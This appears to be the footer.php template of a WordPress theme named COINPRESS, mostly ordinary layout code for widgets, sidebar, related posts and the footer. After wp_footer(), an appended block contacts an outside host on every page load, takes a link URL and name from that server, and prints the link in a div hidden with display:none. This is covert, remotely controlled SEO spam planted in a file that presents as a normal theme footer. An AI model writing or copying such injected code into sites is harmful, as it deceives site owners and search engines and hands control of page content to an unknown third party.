<?php
/**
 * The Footer: widgets area, logo, footer menu and socials
 *
 * @package WordPress
 * @subpackage COINPRESS
 * @since COINPRESS 1.0
 */

						// Widgets area inside page content
						coinpress_create_widgets_area( 'widgets_below_content' );
						?>
					</div><!-- </.content> -->

					<?php
					// Show main sidebar
					get_sidebar();

					$coinpress_body_style = coinpress_get_theme_option( 'body_style' );
					if ( 'fullscreen' != $coinpress_body_style ) {
						?>
						</div><!-- </.content_wrap> -->
						<?php
					}

					// Widgets area below page content and related posts below page content
					$coinpress_widgets_name = coinpress_get_theme_option( 'widgets_below_page' );
					$coinpress_show_widgets = ! coinpress_is_off( $coinpress_widgets_name ) && is_active_sidebar( $coinpress_widgets_name );
					$coinpress_show_related = is_single() && coinpress_get_theme_option( 'related_position' ) == 'below_page';
					if ( $coinpress_show_widgets || $coinpress_show_related ) {
						if ( 'fullscreen' != $coinpress_body_style ) {
							?>
							<div class="content_wrap">
							<?php
						}
						// Show related posts before footer
						if ( $coinpress_show_related ) {
							do_action( 'coinpress_action_related_posts' );
						}

						// Widgets area below page content
						if ( $coinpress_show_widgets ) {
							coinpress_create_widgets_area( 'widgets_below_page' );
						}
						if ( 'fullscreen' != $coinpress_body_style ) {
							?>
							</div><!-- </.content_wrap> -->
							<?php
						}
					}
					?>
			</div><!-- </.page_content_wrap> -->

			<?php
			// Single posts banner before footer
			if ( is_singular( 'post' ) ) {
				coinpress_show_post_banner('footer');
			}

            // Skip link anchor to fast access to the footer from keyboard
            ?>
            <a id="footer_skip_link_anchor" class="coinpress_skip_link_anchor" href="#"></a>
            <?php

			// Footer
			$coinpress_footer_type = coinpress_get_theme_option( 'footer_type' );
			if ( 'custom' == $coinpress_footer_type && ! coinpress_is_layouts_available() ) {
				$coinpress_footer_type = 'default';
			}
			get_template_part( apply_filters( 'coinpress_filter_get_template_part', "templates/footer-{$coinpress_footer_type}" ) );
			?>

		</div><!-- /.page_wrap -->

	</div><!-- /.body_wrap -->

	<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>